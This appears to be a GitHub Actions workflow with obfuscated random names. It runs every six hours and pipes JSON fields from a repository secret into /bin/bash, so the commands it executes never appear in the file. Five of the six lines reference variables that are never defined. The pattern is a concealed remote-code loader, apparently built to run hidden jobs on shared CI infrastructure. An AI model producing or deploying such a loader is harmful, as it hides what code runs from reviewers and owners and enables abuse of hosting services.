name: youngroundyy
on:
  workflow_dispatch:
  schedule:
    - cron: '36 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: youngroundyy
        env:
          gmpw6578: ${{ secrets.gmpw6578 }}
        run: |
          echo $gmpw6578 | jq -r .jfp056 | /bin/bash
          echo $qlh0418 | jq -r .vdoeh6616 | /bin/bash
          echo $paisr9 | jq -r .tpsr9 | /bin/bash
          echo $s760 | jq -r .owvw7988 | /bin/bash
          echo $mcap9109 | jq -r .lrual20794 | /bin/bash
          echo $fnhsw0 | jq -r .tzwo3 | /bin/bash

